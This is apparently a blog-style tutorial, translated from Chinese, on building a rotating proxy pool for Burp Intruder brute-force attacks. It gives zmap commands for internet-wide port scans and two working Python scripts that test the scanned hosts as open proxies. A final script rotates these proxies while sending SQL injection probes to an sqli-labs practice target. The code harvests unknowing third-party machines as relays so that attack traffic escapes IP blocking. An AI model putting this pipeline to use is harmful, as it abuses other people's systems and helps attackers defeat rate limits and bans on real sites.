Basic workflow
1. Use zmap to harvest a large number of candidate proxy IPs
2. Use the py1 script for an initial filter of usable IPs
3. Use the py2 script to filter again for IPs that work against the target site (a safe check, no payloads)
4. Configure the Burp extension and load the collected proxy pool
5. Load the payloads and start the brute-force attack
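For orientation, here is the pipeline above chained end to end. This is only a sketch: the filenames py1.py and py2.py are placeholders for the two scripts pasted below, and only the port-80 scan is wired in.
import shutil
import subprocess

# Step 1: scan for candidate IPs (zmap sweeps the whole IPv4 space by default and needs root)
subprocess.run(['sudo', 'zmap', '-p', '80', '-o', 'ips80.txt'], check=True)

# py1 reads raw_ips.txt, so copy (or deduplicate) the scan output into it
shutil.copyfile('ips80.txt', 'raw_ips.txt')

# Steps 2-3: the two filtering scripts pasted in the Python section below
subprocess.run(['python3', 'py1.py'], check=True)  # raw_ips.txt -> InProxyPool.txt
subprocess.run(['python3', 'py2.py'], check=True)  # InProxyPool.txt -> FProxies.txt

# Steps 4-5 happen inside Burp: load the extension, point it at FProxies.txt,
# then configure payloads in Intruder and start the attack.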
Zmap
Install on Kali
sudo apt update
sudo apt install zmap
zmap --version
Scanning
zmap -p 80 -o ips80.txt
In another terminal:
zmap -p 443 -o ips443.txt
Let the scans run for a while so there are enough IPs for the filtering step.
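zmap writes one IP per line. A minimal sketch for deduplicating the port-80 results into the file py1 expects (filenames as above; note that py1's add_port_to_ips appends :80, so the port-443 list would need a separate pass with the right port):
# Deduplicate the port-80 scan output into py1's input file.
seen = set()
with open('ips80.txt') as src, open('raw_ips.txt', 'w') as dst:
    for line in src:
        ip = line.strip()
        if ip and ip not in seen:
            seen.add(ip)
            dst.write(ip + '\n')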
Python
py1: initial filter. Put the scan results from the previous step into raw_ips.txt.
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading

# Input and output file paths
raw_input_file = 'raw_ips.txt'                 # raw IP list (may contain commas)
processed_output_file = 'ip.txt'               # IP list after formatting
available_proxy_file_path = 'InProxyPool.txt'  # output file for usable proxies

# Several test URLs (well-known sites) used to validate proxies more strictly
test_urls = [
    'http://www.baidu.com',
    'http://www.jd.com/',
    'http://www.taobao.com/'
]

# Thread lock for file writes
lock = threading.Lock()

# True until the first usable proxy has been written to the output file
first_write = True


def replace_comma_with_colon(raw_input_file, output_file):
    """
    Replace commas with colons in the input file and save to a new file.
    """
    with open(raw_input_file, 'r') as file:
        lines = file.readlines()
    # Replace commas with colons
    modified_lines = [line.replace(',', ':').strip() for line in lines]
    # Write to the new file; 'w' mode truncates any existing content first
    with open(output_file, 'w') as file:
        for line in modified_lines:
            file.write(line + '\n')
    print(f"IP formatting done, results saved to {output_file}")


# Append :port to each IP
def add_port_to_ips(input_file_path, output_file_path, port=80):
    try:
        with open(input_file_path, 'r') as infile, open(output_file_path, 'w') as outfile:
            for line in infile:
                ip = line.strip()  # strip whitespace (e.g. the trailing newline)
                new_ip = f"{ip}:{port}"
                outfile.write(new_ip + "\n")
    except FileNotFoundError:
        print(f"Input file {input_file_path} does not exist, please check the path.")
def test_proxy(proxy):
    """
    Test a single proxy against every test URL; only proxies that pass all of them
    are considered usable and are written to the output file immediately.
    """
    global first_write
    proxy = proxy.strip()  # remove the trailing newline
    if not proxy:          # skip empty lines
        return None
    # Proxy settings for requests
    proxies_dict = {
        'http': f'http://{proxy}',
        'https': f'https://{proxy}'
    }
    is_available = True
    for url in test_urls:
        try:
            # Send the request with a 5-second timeout
            response = requests.get(url, proxies=proxies_dict, timeout=5)
            if response.status_code != 200:
                is_available = False
                break
        except requests.RequestException:
            is_available = False
            break
    if is_available:
        print(f'Proxy {proxy} is usable')
        with lock:
            # Truncate the file on the first write, append afterwards
            mode = 'w' if first_write else 'a'
            with open(available_proxy_file_path, mode) as file:
                file.write(f'{proxy}\n')
            if first_write:
                first_write = False
        return proxy
    else:
        print(f'Proxy {proxy} is not usable')
        return None


def main():
    # Step 1: format the IP file
    # replace_comma_with_colon(raw_input_file, processed_output_file)
    add_port_to_ips(raw_input_file, processed_output_file)
    # Step 2: read the formatted IP file and validate each proxy
    with open(processed_output_file, 'r') as file:
        proxies = file.readlines()
    # Validate concurrently with a thread pool
    with ThreadPoolExecutor(max_workers=20) as executor:
        future_to_proxy = {executor.submit(test_proxy, proxy): proxy for proxy in proxies}
        for future in as_completed(future_to_proxy):
            proxy = future_to_proxy[future]
            try:
                future.result()  # propagate any exception from the worker
            except Exception as e:
                print(f'Error while validating proxy {proxy}: {e}')
    print(f"\nValidation finished; usable proxies written to: {available_proxy_file_path}")


if __name__ == "__main__":
    main()
Running py1 produces the first proxy pool, InProxyPool.txt. When these proxies are used against the target site, many of them still return other status codes or fail to connect, so we filter them once more against the specific target.
py2: second-pass filter, a safe test against the target site (no payloads)
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import sys
import io

# Force stdout to UTF-8
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')

# Minimum acceptable response body length
MIN_LENGTH = 100
# Maximum number of worker threads
MAX_WORKERS = 100
# Output file path
OUTPUT_FILE_PATH = 'FProxies.txt'
# Input file path
input_file_path = 'InProxyPool.txt'


def check_proxy(proxy):
    """Test the proxy against the target site (no payload, just a plain request)."""
    test_url = "https://sqli-labs.bachang.org/Less-1/"
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        response = requests.get(test_url, proxies=proxies, timeout=2)
        if response.status_code == 200 and len(response.content) >= MIN_LENGTH:
            return proxy  # usable proxy
    except Exception:
        pass
    return None  # unusable proxy


def validate_proxy(proxy, lock):
    """Validate a single proxy and write it to the output file if usable."""
    valid_proxy = check_proxy(proxy)
    if valid_proxy:
        with lock:
            # Append rather than overwrite, so earlier hits are not wiped out
            with open(OUTPUT_FILE_PATH, 'a') as outfile:
                outfile.write(f"{valid_proxy}\n")
        print(f"Usable proxy: {valid_proxy}")
    else:
        print(f"Unusable proxy: {proxy}")


def validate_proxies_from_file(input_file_path):
    """Read proxies from the input file, validate them concurrently, and collect the usable ones."""
    lock = threading.Lock()
    open(OUTPUT_FILE_PATH, 'w').close()  # start with an empty output file
    with open(input_file_path, 'r') as infile:
        proxies = [line.strip() for line in infile]
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = [executor.submit(validate_proxy, proxy, lock) for proxy in proxies]
        for future in as_completed(futures):
            future.result()  # wait for every task to finish


validate_proxies_from_file(input_file_path)
This produces the second IP pool, FProxies.txt (it may still need further filtering).
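One possible extra pass, not part of the original workflow: re-run the same target check a few times and keep only the proxies that succeed every time. The target URL is the one from py2; the round count and timeout are arbitrary choices.
import requests

TARGET = "https://sqli-labs.bachang.org/Less-1/"  # same target URL as in py2
ROUNDS = 3  # require three consecutive successes (arbitrary threshold)

def stable(proxy):
    """Return True only if the proxy reaches the target in every round."""
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    for _ in range(ROUNDS):
        try:
            r = requests.get(TARGET, proxies=proxies, timeout=5)
            if r.status_code != 200:
                return False
        except requests.RequestException:
            return False
    return True

with open('FProxies.txt') as f:
    pool = [p.strip() for p in f if p.strip()]

survivors = [p for p in pool if stable(p)]
with open('FProxies.txt', 'w') as f:
    f.write('\n'.join(survivors) + '\n')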
Burp
Set up the Python environment (Jython)
Load the Python extension
Enable the extension and load the IP pool
Load the payloads in Intruder and start the brute-force attack.
(A failed example: my IP pool is not large or reliable enough yet.)
Other ways of building a proxy pool are worth exploring.
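The Burp extension itself is not reproduced here; conceptually it routes each Intruder request through a different proxy from the pool. Below is a standalone sketch of that rotation idea using requests: the target URL comes from py2, while the id parameter and the payload list are placeholders standing in for whatever is loaded in Intruder.
import itertools
import requests

TARGET = "https://sqli-labs.bachang.org/Less-1/"  # target URL from py2

with open('FProxies.txt') as f:
    pool = [p.strip() for p in f if p.strip()]

rotation = itertools.cycle(pool)  # round-robin through the pool

# Placeholder payloads; in the real workflow these live in Intruder
payloads = ["1", "1'", "1' --+"]

for payload in payloads:
    proxy = next(rotation)
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        r = requests.get(TARGET, params={"id": payload}, proxies=proxies, timeout=5)
        print(proxy, payload, r.status_code, len(r.content))
    except requests.RequestException as e:
        print(proxy, payload, "failed:", e)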
Bad at this~~~ but still love~~~ to play~~~